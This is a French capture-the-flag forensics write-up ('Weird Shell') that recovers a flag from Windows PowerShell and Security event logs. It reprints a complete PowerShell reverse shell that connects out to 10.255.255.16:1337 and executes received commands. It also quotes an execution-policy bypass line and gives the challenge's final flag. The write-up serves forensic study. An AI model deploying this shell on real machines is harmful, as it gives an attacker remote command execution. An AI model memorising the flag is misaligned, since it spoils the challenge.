# Weird Shell

## Énoncé

Un autre utilisateur a un comportement similaire à [`La gazette de Windows`](../../Intro/La%20gazette%20de%20Windows/README.md) (catégorie intro). Mais cette fois, pour retrouver ce qui a été envoyé à l'attaquant il faudra peut-être plus de logs.

- [Microsoft-Windows-PowerShell4Operational.evtx](Microsoft-Windows-PowerShell4Operational.evtx)
- [Security.evtx](Security.evtx)


## Solution

Comme pour [La gazette de Windows](../../Intro/La%20gazette%20de%20Windows/README.md), on installe et utilise [python-evtx](https://github.com/williballenthin/python-evtx) pour convertir les fichiers d'événement dans un format lisible.

On trouve rapidement, dans `Microsoft-Windows-PowerShell4Operational.evtx`, deux évènements intéressants. Le premier pointe vers 
un script powershell qui est lancé.

```xml
<Data Name="ScriptBlockText">if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'D:\PAYLOAD.PS1'</Data>
```

Juste après, on trouve le script en question :

```powershell
do {
    Start-Sleep -Seconds 1
     try{
        $TCPClient = New-Object Net.Sockets.TCPClient('10.255.255.16', 1337)
    } catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
function WriteToStream ($String) {
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
    $StreamWriter.Write($String + 'SHELL&gt; ')
    $StreamWriter.Flush()
}
WriteToStream "FCSC{$(([System.BitConverter]::ToString(([System.Security.Cryptography.SHA256]::Create()).ComputeHash(([System.Text.Encoding]::UTF8.GetBytes(((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name).ToString()))))).Replace('-', '').ToLower())}`n"
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    $Output = try {
            Invoke-Expression $Command 2&gt;&amp;1 | Out-String
        } catch {
            $_ | Out-String
        }
    WriteToStream ($Output)
}
$StreamWriter.Close()
```

L'important est la ligne qui construit le flag de validation. Décomposé pour être plus lisible, cela nous donne :

```powershell
FCSC{
    $(([System.BitConverter]::ToString(
        ([System.Security.Cryptography.SHA256]::Create())
            .ComputeHash(
                ([System.Text.Encoding]::UTF8.GetBytes(
                    ((Get-Process -Id $PID).Id.ToString()+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name)
                        .ToString()
                ))
            )
    )).Replace('-', '').ToLower())
}
```

Donc, on a besoin :
- du PID du process (`Get-Process -Id $PID`)
- du nom complet de l'utilisateur, c'est à dire incluant le domaine (`GetCurrent().Name`)

Sur l'évènement qui mentionne `PAYLOAD.PS1`, on retrouve le `PID` et le `User-ID` :
```xml
<Execution ProcessID="3788" ThreadID="748"></Execution>
<Security UserID="S-1-5-21-3727796838-1318123174-2233927406-1107"></Security>
```

Pour avoir les détails de l'utilisateur, il faut se tourner vers `Security.evtx` et chercher le `User-ID` :
```xml
<EventData><Data Name="TargetUserSid">S-1-5-21-3727796838-1318123174-2233927406-1107</Data>
<Data Name="TargetUserName">cmaltese</Data>
<Data Name="TargetDomainName">FCSC</Data>
<Data Name="TargetLogonId">0x0000000000dcdea4</Data>
</EventData>
```

On a un `PID` qui vaut `3788`, un utilisateur `FCSC\cmaltese`, on les concatène avant de donner un coup de `SHA256` :

```
$ echo -n "3788FCSC\cmaltese" | sha256sum 
21311ed8321926a27f6a6c407fdbe7dc308535caad861c004b382402b556bbfa  -
`̀``

Le flag est donc `FCSC{21311ed8321926a27f6a6c407fdbe7dc308535caad861c004b382402b556bbfa}`.